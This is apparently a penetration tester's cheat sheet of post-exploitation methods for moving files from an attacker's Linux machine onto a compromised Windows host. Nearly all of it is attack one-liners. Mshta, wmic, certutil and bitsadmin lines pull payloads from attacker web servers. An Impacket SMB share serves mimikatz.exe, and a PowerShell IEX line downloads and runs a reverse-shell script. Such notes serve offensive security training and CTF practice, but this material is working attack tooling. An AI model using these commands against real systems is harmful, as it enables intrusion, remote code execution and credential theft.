File Transfer Methods

Transferring Files from Linux to Windows (post-exploitation)ropnop blog

(Almost) All The Ways to File TransferMedium

# mshta
vbscript:Close(Execute(“GetObject(“”script:http://webserver/payload.sct””)”))

# wmic
wmic os get /format:”https://webserver/payload.xsl

# cerutil
certutil -urlcache -split -f http://webserver/payload 

# bitsadmin
bitsadmin /rawreturn /transfer getpayload http://IP/nc.exe

# Using FTP
# On the Linux Box:
python3 -m pyftpdlib -p {port number}
# On the Windows Box:
C:\Windows\System32\ftp.exe {ip address}

# Using SMB from Impacket
python /opt/impacket/build/scripts-2.7/smbserver.py {SHARENAME} {PATH}
python /opt/impacket/build/scripts-2.7/smbserver.py SQUID /root/HTB/www

# On the Windows Box:
net view \\{attacker IP}
Example: net view \\10.11.0.47

# Commands to use are: {dir} {copy} {move} etc...
Example: copy \\10.11.0.47\SQUID\mimikatz.exe .

# Using powershell
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1')" 

# Invoke Web request
IWR -uri http://10.10.14.15/file.exe -outfile file.exe  

SMB from Powershell

# Step 1 - Start smbserver from Kali
impacket-smbserver myshare $(pwd) -username admin -password "test123"

# Step 2 on the target machine
$pass = "test123" | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('admin', $pass)
New-PSDrive -name myshare -root \\10.10.14.12\stuff -Credential $cred -PSProvider "FileSystem" 
# Details:
# myshare is the name of the share you created on step 1 
 

# Then:

cd myshare: 
# And check the files